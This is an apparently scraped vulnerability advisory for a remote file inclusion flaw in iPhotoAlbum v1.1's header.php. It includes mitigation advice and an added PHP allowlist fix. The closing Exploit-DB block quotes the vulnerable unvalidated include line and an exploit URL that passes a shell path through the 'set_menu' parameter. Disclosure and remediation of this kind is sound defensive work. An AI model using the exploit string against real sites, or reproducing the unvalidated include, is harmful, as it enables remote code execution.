Vendor: iPhotoAlbum
By: GloD_M = [Mahmood_ali]
CVSS: 7.5 (HIGH)
CWE: Remote File Include
Product Name: iPhotoAlbum
Affected Version From: v1.1
Affected Version To: v1.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

iPhotoAlbum v1.1 Remote File Include Vulnerability

iPhotoAlbum v1.1 is vulnerable to remote file inclusion in 'lib/static/header.php'. The script passes the 'set_menu' parameter to include() without any validation, so an attacker who controls that parameter can make the server load and execute a file of their choosing. This can lead to arbitrary code execution.

Mitigation:

Upgrade to a newer version of the iPhotoAlbum script that has fixed this vulnerability. Alternatively, remove the 'set_menu' parameter from the 'header.php' file.
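
One way to rewrite the include in header.php so that the request value only selects from a fixed list of local files. This is an added example, not iPhotoAlbum's own code; the menu file names, the menus/ directory and the resolve_menu() helper are hypothetical.

```php
<?php
// Added example: hardened replacement for the unvalidated include($set_menu).
// Assumptions (not from the iPhotoAlbum source): the file names in MENU_FILES
// and the menus/ directory are hypothetical placeholders.

// Accepted request values mapped to fixed local files. Nothing taken from the
// request is ever concatenated into a path or handed to include().
const MENU_FILES = [
    'main'  => 'menu_main.php',
    'admin' => 'menu_admin.php',
];

function resolve_menu(?string $requested, string $baseDir): ?string
{
    // Unknown keys, URLs and traversal strings all fail the allowlist lookup.
    if ($requested === null || !array_key_exists($requested, MENU_FILES)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . MENU_FILES[$requested]);
    if ($base === false || $path === false) {
        return null; // directory or file missing: include nothing
    }
    // Defence in depth: the resolved file must still sit under $baseDir,
    // which also catches a symlink pointing somewhere else.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Read the value explicitly from the query string instead of trusting a
// global variable that the request may be able to populate.
$key = (isset($_GET['set_menu']) && is_string($_GET['set_menu']))
    ? $_GET['set_menu']
    : null;

$menu = resolve_menu($key, __DIR__ . '/menus');
if ($menu !== null) {
    include $menu;
}
```

Setting allow_url_include to Off in php.ini blocks URL targets for include() as a second layer, but it does not replace the allowlist, because local paths would still be accepted by the original code.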

Exploit-DB raw data:

# iPhotoAlbum v1.1(header.php)Remote File Include Vulnerability
# D.Script: http://sourceforge.net/projects/iphotoalbum/
# Discovered by: GloD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# V.Code 
# <?php if(isset($set_menu)) { include("$set_menu"); } ?>
# Exploit:[Path]/lib/static/header.php?set_menu=SheLL
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
# Thanx: w4ck1ng.com & h4cky0u.org &  t0pP8uZz 

# milw0rm.com [2007-03-28]